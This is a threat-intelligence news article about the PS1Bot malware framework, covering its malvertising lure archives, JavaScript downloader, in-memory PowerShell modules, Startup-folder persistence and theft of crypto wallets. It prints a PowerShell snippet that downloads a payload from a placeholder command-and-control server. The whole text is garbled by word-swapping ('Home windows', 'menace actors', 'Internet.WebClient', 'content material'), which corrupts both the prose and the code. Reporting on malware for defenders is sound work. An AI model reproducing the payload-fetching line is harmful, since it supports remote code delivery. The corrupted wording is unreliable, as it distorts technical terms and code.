A classy new malware marketing campaign focusing on Home windows methods has emerged, using a multi-stage framework dubbed “PS1Bot” that mixes PowerShell and C# parts to conduct in depth data theft operations.
The malware represents a big evolution in assault methodologies, using modular structure and in-memory execution strategies to evade conventional detection mechanisms whereas sustaining persistent entry to compromised methods.
PS1Bot operates by way of malvertising campaigns that ship compressed archives with filenames designed to match SEO patterns, equivalent to “chapter 8 medicare profit coverage handbook.zip” and “Counting Canadian Cash Worksheets Pdf.zip.e49”.
These seemingly legit information include a JavaScript downloader named “FULL DOCUMENT.js” that initiates the an infection chain by retrieving extra malicious parts from attacker-controlled servers.
The malware’s modular design permits menace actors to deploy numerous specialised parts on-demand, together with data stealers, keyloggers, display seize instruments, and persistence mechanisms.
Cisco Talos analysts famous that PS1Bot has been extraordinarily energetic all through 2025, with new samples being noticed constantly, indicating ongoing improvement and refinement of the framework.
Deobfuscating the downloader script (Supply – Cisco Talos)
What distinguishes PS1Bot from standard malware is its emphasis on stealth by way of minimal disk footprint and in depth use of in-memory execution.
The framework leverages PowerShell’s Invoke-Expression (IEX) performance to dynamically execute modules with out writing them to disk, considerably lowering the probability of detection by conventional antivirus options.
Subtle Persistence and Evasion Mechanisms
PS1Bot implements a very intelligent persistence technique that creates randomly-named PowerShell scripts throughout the %PROGRAMDATA% listing alongside corresponding shortcut information.
The malware generates a malicious LNK file within the Home windows Startup listing that factors to those PowerShell scripts, guaranteeing reactivation after system reboots.
The persistence module retrieves obfuscated payloads from the command and management server’s “/remodel” endpoint, as demonstrated within the following code construction:-
$url = “http://[C2_SERVER]/remodel”
$content material = (New-Object Internet.WebClient).DownloadString($url)
# Content material is then deobfuscated and written to randomly-named PS1 file
This payload incorporates the identical C2 polling logic used within the preliminary an infection, making a self-perpetuating cycle.
The malware constructs distinctive communication URLs utilizing the contaminated system’s C: drive serial quantity, enabling individualized monitoring of compromised machines whereas sustaining operational safety.
The framework’s data theft capabilities are notably regarding, focusing on cryptocurrency wallets by way of embedded wordlists containing seed phrase combos in a number of languages.
Instance HTTP POST containing Base64 encoded screenshot picture file (Supply – Cisco Talos)
PS1Bot scans the file system for paperwork containing pockets restoration phrases and password information, compressing and exfiltrating this delicate knowledge by way of HTTP POST requests to attacker infrastructure.
Cisco Talos researchers recognized vital code similarities between PS1Bot and beforehand reported malware households, together with AHK Bot and parts related to Skitnet campaigns, suggesting potential shared improvement assets or menace actor collaboration throughout these operations.
Enhance your SOC and assist your workforce shield your online business with free top-notch menace intelligence: Request TI Lookup Premium Trial.
